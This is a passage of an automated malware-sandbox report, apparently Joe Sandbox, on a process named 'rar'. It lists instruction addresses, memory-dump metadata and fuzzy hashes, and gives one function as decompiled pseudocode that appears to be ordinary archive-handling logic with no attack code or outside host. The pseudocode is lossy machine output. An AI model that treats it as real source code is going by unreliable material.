                                                                                                            0x7ff650b1b4d8
                                                                                                            0x7ff650b1b4d8
                                                                                                            0x7ff650b1b4e5
                                                                                                            0x7ff650b1b4f2
                                                                                                            0x7ff650b1b4f7
                                                                                                            0x7ff650b1b4fa
                                                                                                            0x7ff650b1b504
                                                                                                            0x7ff650b1b50b
                                                                                                            0x7ff650b1b50e
                                                                                                            0x7ff650b1b511
                                                                                                            0x7ff650b1b514
                                                                                                            0x7ff650b1b51a
                                                                                                            0x7ff650b1b51f
                                                                                                            0x7ff650b1b523
                                                                                                            0x7ff650b1b529
                                                                                                            0x7ff650b1b530
                                                                                                            0x7ff650b1b537
                                                                                                            0x7ff650b1b53e
                                                                                                            0x7ff650b1b546
                                                                                                            0x7ff650b1b54a
                                                                                                            0x7ff650b1b54d
                                                                                                            0x7ff650b1b556
                                                                                                            0x7ff650b1b55b
                                                                                                            0x7ff650b1b565
                                                                                                            0x7ff650b1b565
                                                                                                            0x7ff650b1b56c
                                                                                                            0x7ff650b1b571
                                                                                                            0x7ff650b1b573
                                                                                                            0x7ff650b1b573
                                                                                                            0x7ff650b1b577
                                                                                                            0x7ff650b1b579
                                                                                                            0x7ff650b1b584
                                                                                                            0x7ff650b1b58a
                                                                                                            0x7ff650b1b590
                                                                                                            0x7ff650b1b594
                                                                                                            0x7ff650b1b59e
                                                                                                            0x7ff650b1b5a3
                                                                                                            0x7ff650b1b5a8
                                                                                                            0x7ff650b1b5b2
                                                                                                            0x7ff650b1b5b8
                                                                                                            0x7ff650b1b5b8
                                                                                                            0x7ff650b1b5bf
                                                                                                            0x7ff650b1b5bf
                                                                                                            0x7ff650b1b5cd
                                                                                                            0x7ff650b1b5d4
                                                                                                            0x7ff650b1b5d9
                                                                                                            0x7ff650b1b5de
                                                                                                            0x7ff650b1b5e3
                                                                                                            0x7ff650b1b5e8
                                                                                                            0x7ff650b1b5ed
                                                                                                            0x7ff650b1b5f5
                                                                                                            0x7ff650b1b5fa
                                                                                                            0x7ff650b1b600
                                                                                                            0x7ff650b1b606
                                                                                                            0x7ff650b1b60b
                                                                                                            0x7ff650b1b613
                                                                                                            0x7ff650b1b616
                                                                                                            0x7ff650b1b616
                                                                                                            0x7ff650b1b61a
                                                                                                            0x7ff650b1b61a
                                                                                                            0x7ff650b1b621
                                                                                                            0x7ff650b1b624
                                                                                                            0x7ff650b1b62d
                                                                                                            0x7ff650b1b636
                                                                                                            0x7ff650b1b63f
                                                                                                            0x7ff650b1b648
                                                                                                            0x7ff650b1b64e
                                                                                                            0x7ff650b1b658
                                                                                                            0x7ff650b1b65f
                                                                                                            0x7ff650b1b66a
                                                                                                            0x7ff650b1b671
                                                                                                            0x7ff650b1b678
                                                                                                            0x7ff650b1b67d
                                                                                                            0x7ff650b1b684
                                                                                                            0x7ff650b1b689
                                                                                                            0x7ff650b1b690
                                                                                                            0x7ff650b1b695
                                                                                                            0x7ff650b1b69c
                                                                                                            0x7ff650b1b6a1
                                                                                                            0x7ff650b1b6a9
                                                                                                            0x7ff650b1b6b6
                                                                                                            0x7ff650b1b6c3
                                                                                                            0x7ff650b1b6c8
                                                                                                            0x7ff650b1b6cf
                                                                                                            0x7ff650b1b6d9
                                                                                                            0x7ff650b1b6e2
                                                                                                            0x7ff650b1b6ec
                                                                                                            0x7ff650b1b6f1
                                                                                                            0x7ff650b1b6f5
                                                                                                            0x7ff650b1b703
                                                                                                            0x7ff650b1b708
                                                                                                            0x7ff650b1b70c
                                                                                                            0x7ff650b1b711
                                                                                                            0x7ff650b1b715
                                                                                                            0x7ff650b1b719
                                                                                                            0x7ff650b1b71c
                                                                                                            0x7ff650b1b722
                                                                                                            0x7ff650b1b72c
                                                                                                            0x7ff650b1b72f
                                                                                                            0x7ff650b1b742
                                                                                                            0x7ff650b1b74b
                                                                                                            0x7ff650b1b758
                                                                                                            0x7ff650b1b75c
                                                                                                            0x7ff650b1b765
                                                                                                            0x7ff650b1b768
                                                                                                            0x7ff650b1b773
                                                                                                            0x7ff650b1b77a
                                                                                                            0x7ff650b1b784
                                                                                                            0x7ff650b1b789
                                                                                                            0x7ff650b1b793
                                                                                                            0x7ff650b1b798
                                                                                                            0x7ff650b1b7a2
                                                                                                            0x7ff650b1b7a7
                                                                                                            0x7ff650b1b7b1
                                                                                                            0x7ff650b1b7b8
                                                                                                            0x7ff650b1b7bb
                                                                                                            0x7ff650b1b7cc
                                                                                                            0x7ff650b1b7d6
                                                                                                            0x7ff650b1b7db
                                                                                                            0x7ff650b1b7de
                                                                                                            0x7ff650b1b7e8
                                                                                                            0x7ff650b1b7ea
                                                                                                            0x7ff650b1b7ee
                                                                                                            0x7ff650b1b7f8
                                                                                                            0x7ff650b1b7fa
                                                                                                            0x7ff650b1b7fe
                                                                                                            0x7ff650b1b808
                                                                                                            0x7ff650b1b811
                                                                                                            0x7ff650b1b813
                                                                                                            0x7ff650b1b816
                                                                                                            0x7ff650b1b819
                                                                                                            0x7ff650b1b826
                                                                                                            0x7ff650b1b82b
                                                                                                            0x7ff650b1b835
                                                                                                            0x7ff650b1b83b
                                                                                                            0x7ff650b1b83d
                                                                                                            0x7ff650b1b844
                                                                                                            0x7ff650b1b848
                                                                                                            0x7ff650b1b84f
                                                                                                            0x7ff650b1b856
                                                                                                            0x7ff650b1b858
                                                                                                            0x7ff650b1b867
                                                                                                            0x7ff650b1b86b
                                                                                                            0x7ff650b1b874
                                                                                                            0x7ff650b1b880
                                                                                                            0x7ff650b1b893
                                                                                                            0x7ff650b1b8a0
                                                                                                            0x7ff650b1b8b0
                                                                                                            0x7ff650b1b8b6
                                                                                                            0x7ff650b1b8bb
                                                                                                            0x7ff650b1b8c2
                                                                                                            0x7ff650b1b8c8
                                                                                                            0x7ff650b1b8ce
                                                                                                            0x7ff650b1b8d3
                                                                                                            0x7ff650b1b8da
                                                                                                            0x7ff650b1b8e9
                                                                                                            0x7ff650b1b8f1
                                                                                                            0x7ff650b1b8f1
                                                                                                            0x7ff650b1b8f7
                                                                                                            0x7ff650b1b8fc
                                                                                                            0x7ff650b1b900
                                                                                                            0x7ff650b1b904
                                                                                                            0x7ff650b1b908
                                                                                                            0x7ff650b1b90c
                                                                                                            0x7ff650b1b913
                                                                                                            0x7ff650b1b919
                                                                                                            0x7ff650b1b924
                                                                                                            0x7ff650b1b928
                                                                                                            0x7ff650b1b92f
                                                                                                            0x7ff650b1b93c
                                                                                                            0x7ff650b1b946
                                                                                                            0x7ff650b1b948
                                                                                                            0x7ff650b1b953
                                                                                                            0x7ff650b1b956
                                                                                                            0x7ff650b1b95f
                                                                                                            0x7ff650b1b96c
                                                                                                            0x7ff650b1b979
                                                                                                            0x7ff650b1b986
                                                                                                            0x7ff650b1b999
                                                                                                            0x7ff650b1b9ba
                                                                                                            0x7ff650b1b9c2
                                                                                                            0x7ff650b1b9d2
                                                                                                            0x7ff650b1b9d7
                                                                                                            0x7ff650b1b9e2
                                                                                                            0x7ff650b1b9e4
                                                                                                            0x7ff650b1b9e9
                                                                                                            0x7ff650b1b9f4
                                                                                                            0x7ff650b1ba01
                                                                                                            0x7ff650b1ba13
                                                                                                            0x7ff650b1ba20
                                                                                                            0x7ff650b1ba2d
                                                                                                            0x7ff650b1ba39
                                                                                                            0x7ff650b1ba4d
                                                                                                            0x7ff650b1ba52
                                                                                                            0x7ff650b1ba61
                                                                                                            0x7ff650b1ba68
                                                                                                            0x7ff650b1ba6d
                                                                                                            0x7ff650b1ba7c
                                                                                                            0x7ff650b1ba7e
                                                                                                            0x7ff650b1ba8d
                                                                                                            0x7ff650b1ba96
                                                                                                            0x7ff650b1ba9d
                                                                                                            0x7ff650b1baa6
                                                                                                            0x7ff650b1bab5
                                                                                                            0x7ff650b1bac1
                                                                                                            0x7ff650b1bacf
                                                                                                            0x7ff650b1badb
                                                                                                            0x7ff650b1badd
                                                                                                            0x7ff650b1bae4
                                                                                                            0x7ff650b1baef
                                                                                                            0x7ff650b1bafb
                                                                                                            0x7ff650b1bafd
                                                                                                            0x7ff650b1bb0a
                                                                                                            0x7ff650b1bb13
                                                                                                            0x7ff650b1bb1b
                                                                                                            0x7ff650b1bb23
                                                                                                            0x7ff650b1bb27
                                                                                                            0x7ff650b1bb2a
                                                                                                            0x7ff650b1bb2e
                                                                                                            0x7ff650b1bb3e
                                                                                                            0x7ff650b1bb48
                                                                                                            0x7ff650b1bb4e
                                                                                                            0x7ff650b1bb50
                                                                                                            0x7ff650b1bb54
                                                                                                            0x7ff650b1bb5d
                                                                                                            0x7ff650b1bb63
                                                                                                            0x7ff650b1bb68
                                                                                                            0x7ff650b1bb72
                                                                                                            0x7ff650b1bb76
                                                                                                            0x7ff650b1bb7c
                                                                                                            0x7ff650b1bb8a
                                                                                                            0x7ff650b1bb9b
                                                                                                            0x7ff650b1bbb1
                                                                                                            0x7ff650b1bbb5
                                                                                                            0x7ff650b1bbc5
                                                                                                            0x7ff650b1bbd7
                                                                                                            0x7ff650b1bbdb
                                                                                                            0x7ff650b1bbdf
                                                                                                            0x7ff650b1bbea
                                                                                                            0x7ff650b1bbfe
                                                                                                            0x7ff650b1bc03
                                                                                                            0x7ff650b1bc06
                                                                                                            0x7ff650b1bc11
                                                                                                            0x7ff650b1bc1e
                                                                                                            0x7ff650b1bc2b
                                                                                                            0x7ff650b1bc39
                                                                                                            0x7ff650b1bc46
                                                                                                            0x7ff650b1bc50
                                                                                                            0x7ff650b1bc54
                                                                                                            0x7ff650b1bc57
                                                                                                            0x7ff650b1bc5c
                                                                                                            0x7ff650b1bc63
                                                                                                            0x7ff650b1bc66
                                                                                                            0x7ff650b1bc6c
                                                                                                            0x7ff650b1bc79
                                                                                                            0x7ff650b1bc85
                                                                                                            0x7ff650b1bc8e
                                                                                                            0x7ff650b1bc90
                                                                                                            0x7ff650b1bc96
                                                                                                            0x7ff650b1bcc8

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char
                                                                                                            • String ID:
                                                                                                            • API String ID: 751630497-0
                                                                                                            • Opcode ID: 868e8e6cc1fe7430cf2bd048f2a69ac816d72645504c4b7619e117d3ff529822
                                                                                                            • Instruction ID: f6690c595faecedd7fe54402cfbe6867f7c24faf8c8426b40eb51b9d5281a1b9
                                                                                                            • Opcode Fuzzy Hash: 868e8e6cc1fe7430cf2bd048f2a69ac816d72645504c4b7619e117d3ff529822
                                                                                                            • Instruction Fuzzy Hash: 61329372A08683A5E710DF30D4805FE7BB1EB86788F484035DA8EA7799DE7DE946C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B14448 Relevance: 1.8, APIs: 1, Instructions: 325COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 60%
                                                                                                            			E00007FF67FF650B14448(void* __ebx, void* __rax, long long __rbx, void* __rcx, void* __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t111;
				void* _t153;
				void* _t161;
				void* _t185;
				void* _t186;
				signed long long _t213;
				intOrPtr _t215;
				long long _t217;
				long long _t218;
				unsigned long long _t222;
				unsigned long long _t238;
				intOrPtr* _t256;
				long long _t260;
				intOrPtr _t264;
				void* _t321;
				void* _t322;
				void* _t324;
				void* _t325;
				void* _t327;
				void* _t328;
				void* _t330;
				signed long long _t331;
				void* _t333;
				void* _t339;
				intOrPtr _t342;
				void* _t344;
				void* _t345;
				void* _t346;
				long long _t350;
				void* _t352;
				void* _t354;

				_t235 = __rbx;
				_t161 = __ebx;
				 *((long long*)(_t330 + 0x18)) = __rbx;
				_t328 = _t330 - 0x20890;
				E00007FF67FF650B69CB0(0x20990, __rax, _t344, _t345);
				_t331 = _t330 - __rax;
				_t213 =  *0x50b978f0; // 0x27db226282f1
				 *(_t328 + 0x20880) = _t213 ^ _t331;
				_t325 = __rdx;
				_t322 = __rcx;
				E00007FF67FF650B173C8(__rbx, _t331 + 0x60,  *((intOrPtr*)(__rcx + 0x60)), __rdx, _t354, _t352);
				E00007FF67FF650B173C8(_t235, _t328 + 0x8f30,  *((intOrPtr*)(_t322 + 0x60)), __rdx, _t350, _t346);
				E00007FF67FF650B18178(_t235, _t331 + 0x60);
				_t111 = E00007FF67FF650B180C4(_t331 + 0x60);
				r13d = 0;
				if (_t111 != 0) goto 0x50b144d4;
				E00007FF67FF650B2CA8C(_t111, 0x50ba7ab8, 0x50ba7ab8, _t325, _t325, _t321);
				E00007FF67FF650B1A91C(_t331 + 0x60);
				if (E00007FF67FF650B19368(0, 0x50ba7ab8, _t331 + 0x60) == 0) goto 0x50b144fb;
				E00007FF67FF650B2C930(4, E00007FF67FF650B19368(0, 0x50ba7ab8, _t331 + 0x60), 0x50ba7ab8, 0x50ba7ab8, _t325, _t333, _t339);
				if (E00007FF67FF650B18144(_t331 + 0x60) == 0) goto 0x50b14516;
				E00007FF67FF650B2C930(3, E00007FF67FF650B18144(_t331 + 0x60), 0x50ba7ab8, 0x50ba7ab8, _t325, _t333, _t339);
				E00007FF67FF650B37F90(0, _t186, _t213 ^ _t331, 0x50ba7ab8, 0x50ba7a90, _t328 - 0x66, _t339);
				_t215 =  *((intOrPtr*)(_t322 + 0x60));
				if ( *((intOrPtr*)(_t215 + 0x6132)) == r13b) goto 0x50b14545;
				 *((char*)(_t328 + 0x10eb4)) = 1;
				if ( *((intOrPtr*)(_t215 + 0x6130)) != r13b) goto 0x50b1454c;
				 *((intOrPtr*)(_t328 + 0x10eb4)) = r13b;
				E00007FF67FF650B192F8(0x50ba7ab8, _t328 + 0x8f30, _t325, _t324);
				r9d = 0;
				r8b = 1;
				0x50b18318();
				r15d = r13d;
				r14d = r13d;
				E00007FF67FF650B54598(0xd9c, _t185, 0x50ba7ab8, _t325, _t328, _t328 - 0x66);
				E00007FF67FF650B283F0(_t215, _t325, _t328 - 0x66, _t339, _t327);
				_t256 =  *((intOrPtr*)(_t322 + 0x68));
				if (_t256 == 0) goto 0x50b145a4;
				_t217 =  *((intOrPtr*)( *_t256));
				 *0x50b80550();
				 *((long long*)(_t322 + 0x68)) = _t350;
				_t237 = _t322 + 0x178;
				E00007FF67FF650B5D710(0xd9c, _t256, _t217, _t322 + 0x178, _t328 + 0x11f00, _t322 + 0x178, _t325);
				if ( *((intOrPtr*)(_t328 + 0x7edc)) == r13b) goto 0x50b146e9;
				if ( *((intOrPtr*)(_t328 + 0x7ed8)) != 3) goto 0x50b145fe;
				E00007FF67FF650B69B58(_t217, _t328 + 0x11f00);
				 *((long long*)(_t331 + 0x40)) = _t217;
				if (_t217 == 0) goto 0x50b145f9;
				E00007FF67FF650B38D08(_t217, _t322 + 0x178, _t217, _t322 + 0x178);
				goto 0x50b145fc;
				_t260 = _t350;
				goto 0x50b14638;
				_t218 =  *((intOrPtr*)(_t322 + 0x60));
				if ( *((intOrPtr*)(_t218 + 0x10)) - _t260 <= 0) goto 0x50b14611;
				 *((long long*)(_t218 + 0x10)) = _t260;
				E00007FF67FF650B69B58(_t218, _t260);
				 *((long long*)(_t331 + 0x40)) = _t218;
				if (_t218 == 0) goto 0x50b14635;
				E00007FF67FF650B3D1F8(_t218, _t237, _t218, _t237);
				goto 0x50b14638;
				 *((long long*)(_t322 + 0x68)) = _t350;
				 *0x50b80550();
				_t238 =  *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x60)) + 0x10));
				goto 0x50b14683;
				_t264 =  *((intOrPtr*)(_t322 + 0x60));
				_t222 =  *(_t264 + 0x10);
				if (_t222 - 0x100000 <= 0) goto 0x50b14965;
				 *(_t264 + 0x10) = _t222 >> 1;
				if ( *0x50b80550() == 0) goto 0x50b14660;
				if (_t238 ==  *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x60)) + 0x10))) goto 0x50b146bc;
				_t239 = _t238 >> 0x14;
				r8d = 0x21790;
				E00007FF67FF650B11144(0x29, _t161);
				 *0x50b80550();
				E00007FF67FF650B35F7C(_t322 + 8, _t322, _t331 + 0x60, _t328 + 0x8f30);
				E00007FF67FF650B1C330( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x68)))) + 0x10)), _t238 >> 0x14, _t331 + 0x60);
				r8d = 0;
				goto 0x50b1485d;
				if (E00007FF67FF650B18144(_t331 + 0x60) == 0) goto 0x50b1471d;
				E00007FF67FF650B2C930(3, E00007FF67FF650B18144(_t331 + 0x60), _t238 >> 0x14, 0x50ba7ab8, _t322, _t331 + 0x60, _t328 + 0x8f30);
				 *((intOrPtr*)(_t331 + 0x30)) = r13d;
				 *((long long*)(_t331 + 0x28)) = _t350;
				 *((char*)(_t331 + 0x20)) = 1;
				r9d = 6;
				r8d = 0;
				if (E00007FF67FF650B24498(0x29, 3, _t238 >> 0x14,  *((intOrPtr*)(_t322 + 0x60)), _t328 + 0x3478, _t322, _t325, _t328, _t331 + 0x60) == 0) goto 0x50b14792;
				E00007FF67FF650B37F90(1, _t186,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x68)))) + 0x10)), _t238 >> 0x14, 0x50ba7a90, _t328 + 0x34a0, _t328 + 0x8f30);
				r9b =  *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x60)) + 0x7157));
				r8d = 0;
				E00007FF67FF650B5CFFC(0, _t185,  *((intOrPtr*)(_t322 + 0x60)), _t328 + 0x34a0, _t325);
				r14d = r14d + 1;
				E00007FF67FF650B1A3E8();
				goto 0x50b1485a;
				r8b =  *((intOrPtr*)(_t328 + 0x7edc)) == 0;
				r9b =  *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x60)) + 0x7157));
				E00007FF67FF650B5CFFC( *((intOrPtr*)(_t328 + 0x7edc)), _t185,  *((intOrPtr*)(_t322 + 0x60)), _t328 + 0x34a0, _t325);
				if ( *((intOrPtr*)(_t328 + 0x7edc)) == r13b) goto 0x50b1482b;
				r8d = 0;
				E00007FF67FF650B1A3A0(_t238 >> 0x14, _t331 + 0x60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x68)))) + 0x10)), _t325);
				 *((char*)(_t331 + 0x20)) = 1;
				E00007FF67FF650B15F6C(0x29,  *((intOrPtr*)(_t328 + 0x7edc)) - r13b, _t239, _t322, _t331 + 0x60, _t322, _t325,  *((intOrPtr*)(_t328 + 0x7ec8)), _t328 + 0x11f00, _t344, _t345);
				 *((intOrPtr*)(_t331 + 0x30)) = r13d;
				 *((char*)(_t331 + 0x28)) = 1;
				 *((long long*)(_t331 + 0x20)) = _t328 + 0x11f00;
				_t342 =  *((intOrPtr*)(_t322 + 0x68));
				_t338 = _t328 + 0x8f30;
				E00007FF67FF650B15A44(0x29, _t239, _t322, _t331 + 0x60, _t325, _t328 + 0x8f30, _t342, _t344, _t345);
				E00007FF67FF650B1A430(_t331 + 0x60);
				goto 0x50b14857;
				 *((intOrPtr*)(_t331 + 0x20)) = r13b;
				r9d = 0;
				r8d = 0;
				_t85 = _t342 + 2; // 0x2
				E00007FF67FF650B1B4D8(_t85, _t328 + 0x11f00, _t328 + 0x8f30, _t331 + 0x60, _t328 + 0x8f30, _t344, _t345);
				E00007FF67FF650B182C8(_t239, _t328 + 0x8f30, _t331 + 0x60, _t342);
				r15d = r15d + 1;
				r8b = 1;
				 *((long long*)(_t331 + 0x20)) = _t350;
				if (E00007FF67FF650B195E0(_t239, _t328 + 0x8f30, _t331 + 0x60, _t322, _t325,  *((intOrPtr*)(_t322 + 0x68))) != 0) goto 0x50b146fe;
				_t285 =  *((intOrPtr*)(_t322 + 0x68));
				if ( *((intOrPtr*)(_t322 + 0x68)) == 0) goto 0x50b14895;
				 *0x50b80550();
				if (r14d != 0) goto 0x50b148a8;
				E00007FF67FF650B31FB0(_t328 + 0x8f30);
				goto 0x50b148b2;
				E00007FF67FF650B1A464(0x29, r14d,  *((intOrPtr*)( *_t285 + 0x28)), _t239, _t328 + 0x8f30, _t331 + 0x60, _t328 + 0x8f30,  *((intOrPtr*)(_t322 + 0x68)));
				if (r15d != 0) goto 0x50b148d4;
				E00007FF67FF650B33184(1,  *((intOrPtr*)( *_t285 + 0x28)), _t239, _t325);
				E00007FF67FF650B54598(0xda0, _t185, _t239, _t325, _t328, _t328 + 0x8f30);
				E00007FF67FF650B283F0( *((intOrPtr*)( *_t285 + 0x28)), _t325, _t328 + 0x8f30,  *((intOrPtr*)(_t322 + 0x68)));
				if (r14d != 0) goto 0x50b148f7;
				_t97 = _t352 + 0x43; // 0x43
				_t153 = E00007FF67FF650B111C0(_t97, _t325);
				_t98 = _t352 + 0xa; // 0xa
				E00007FF67FF650B2CC24(_t153, _t98, r14d, 0x50ba7ab8);
				goto 0x50b14917;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x60)) + 0x7156)) != r13b) goto 0x50b14917;
				E00007FF67FF650B54598(0xd28, _t185, _t239, _t325, _t328, _t338);
				E00007FF67FF650B283F0( *((intOrPtr*)(_t322 + 0x60)), _t325, _t338,  *((intOrPtr*)(_t322 + 0x68)));
				E00007FF67FF650B5D8F0( *((intOrPtr*)(_t322 + 0x60)), _t239, _t328 + 0x11f00);
				E00007FF67FF650B175D4(_t239, _t328 + 0x8f30);
				return E00007FF67FF650B69D10(E00007FF67FF650B175D4(_t239, _t331 + 0x60), 0xd28,  *(_t328 + 0x20880) ^ _t331);
			}





































                                                                                                            0x7ff650b14448
                                                                                                            0x7ff650b14448
                                                                                                            0x7ff650b14448
                                                                                                            0x7ff650b14458
                                                                                                            0x7ff650b14465
                                                                                                            0x7ff650b1446a
                                                                                                            0x7ff650b1446d
                                                                                                            0x7ff650b14477
                                                                                                            0x7ff650b1447e
                                                                                                            0x7ff650b14481
                                                                                                            0x7ff650b1448d
                                                                                                            0x7ff650b1449e
                                                                                                            0x7ff650b144ac
                                                                                                            0x7ff650b144b6
                                                                                                            0x7ff650b144c2
                                                                                                            0x7ff650b144c7
                                                                                                            0x7ff650b144cf
                                                                                                            0x7ff650b144d9
                                                                                                            0x7ff650b144ec
                                                                                                            0x7ff650b144f6
                                                                                                            0x7ff650b14507
                                                                                                            0x7ff650b14511
                                                                                                            0x7ff650b14523
                                                                                                            0x7ff650b14528
                                                                                                            0x7ff650b14533
                                                                                                            0x7ff650b1453c
                                                                                                            0x7ff650b14543
                                                                                                            0x7ff650b14545
                                                                                                            0x7ff650b14553
                                                                                                            0x7ff650b14558
                                                                                                            0x7ff650b1455b
                                                                                                            0x7ff650b1456a
                                                                                                            0x7ff650b1456f
                                                                                                            0x7ff650b14572
                                                                                                            0x7ff650b1457a
                                                                                                            0x7ff650b14585
                                                                                                            0x7ff650b1458a
                                                                                                            0x7ff650b14591
                                                                                                            0x7ff650b1459b
                                                                                                            0x7ff650b1459e
                                                                                                            0x7ff650b145a4
                                                                                                            0x7ff650b145a8
                                                                                                            0x7ff650b145b9
                                                                                                            0x7ff650b145c6
                                                                                                            0x7ff650b145d3
                                                                                                            0x7ff650b145da
                                                                                                            0x7ff650b145df
                                                                                                            0x7ff650b145e7
                                                                                                            0x7ff650b145ef
                                                                                                            0x7ff650b145f7
                                                                                                            0x7ff650b145f9
                                                                                                            0x7ff650b145fc
                                                                                                            0x7ff650b145fe
                                                                                                            0x7ff650b1460b
                                                                                                            0x7ff650b1460d
                                                                                                            0x7ff650b14616
                                                                                                            0x7ff650b1461b
                                                                                                            0x7ff650b14623
                                                                                                            0x7ff650b1462b
                                                                                                            0x7ff650b14633
                                                                                                            0x7ff650b14638
                                                                                                            0x7ff650b1464d
                                                                                                            0x7ff650b14657
                                                                                                            0x7ff650b1465e
                                                                                                            0x7ff650b14660
                                                                                                            0x7ff650b14664
                                                                                                            0x7ff650b1466e
                                                                                                            0x7ff650b14677
                                                                                                            0x7ff650b14696
                                                                                                            0x7ff650b146a3
                                                                                                            0x7ff650b146a9
                                                                                                            0x7ff650b146ad
                                                                                                            0x7ff650b146b7
                                                                                                            0x7ff650b146cb
                                                                                                            0x7ff650b146e4
                                                                                                            0x7ff650b146ee
                                                                                                            0x7ff650b146f6
                                                                                                            0x7ff650b146f9
                                                                                                            0x7ff650b1470a
                                                                                                            0x7ff650b14718
                                                                                                            0x7ff650b1471d
                                                                                                            0x7ff650b14722
                                                                                                            0x7ff650b14727
                                                                                                            0x7ff650b1472c
                                                                                                            0x7ff650b14732
                                                                                                            0x7ff650b14747
                                                                                                            0x7ff650b1475f
                                                                                                            0x7ff650b14768
                                                                                                            0x7ff650b1476f
                                                                                                            0x7ff650b1477b
                                                                                                            0x7ff650b14780
                                                                                                            0x7ff650b14788
                                                                                                            0x7ff650b1478d
                                                                                                            0x7ff650b147a0
                                                                                                            0x7ff650b147a4
                                                                                                            0x7ff650b147b2
                                                                                                            0x7ff650b147be
                                                                                                            0x7ff650b147c0
                                                                                                            0x7ff650b147cb
                                                                                                            0x7ff650b147d0
                                                                                                            0x7ff650b147ea
                                                                                                            0x7ff650b147ef
                                                                                                            0x7ff650b147f4
                                                                                                            0x7ff650b147ff
                                                                                                            0x7ff650b14804
                                                                                                            0x7ff650b14808
                                                                                                            0x7ff650b14817
                                                                                                            0x7ff650b14821
                                                                                                            0x7ff650b14829
                                                                                                            0x7ff650b1482b
                                                                                                            0x7ff650b14830
                                                                                                            0x7ff650b14833
                                                                                                            0x7ff650b14836
                                                                                                            0x7ff650b14841
                                                                                                            0x7ff650b14852
                                                                                                            0x7ff650b14857
                                                                                                            0x7ff650b1485a
                                                                                                            0x7ff650b1485d
                                                                                                            0x7ff650b14879
                                                                                                            0x7ff650b1487f
                                                                                                            0x7ff650b14886
                                                                                                            0x7ff650b1488f
                                                                                                            0x7ff650b1489f
                                                                                                            0x7ff650b148a1
                                                                                                            0x7ff650b148a6
                                                                                                            0x7ff650b148ad
                                                                                                            0x7ff650b148b5
                                                                                                            0x7ff650b148ba
                                                                                                            0x7ff650b148c4
                                                                                                            0x7ff650b148cf
                                                                                                            0x7ff650b148d7
                                                                                                            0x7ff650b148dc
                                                                                                            0x7ff650b148e0
                                                                                                            0x7ff650b148e5
                                                                                                            0x7ff650b148f0
                                                                                                            0x7ff650b148f5
                                                                                                            0x7ff650b14902
                                                                                                            0x7ff650b14909
                                                                                                            0x7ff650b14911
                                                                                                            0x7ff650b1491e
                                                                                                            0x7ff650b1492b
                                                                                                            0x7ff650b14964

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLaststd::bad_alloc::bad_alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3411599622-0
                                                                                                            • Opcode ID: 69d3932824eacdcbbf90439e5fb161c001c683a6a7b8593c7a95b26e08c3145d
                                                                                                            • Instruction ID: a03e8dae0d9252e3197a1c003b3f06871435d8bc937e2fe6c87968704c5d539d
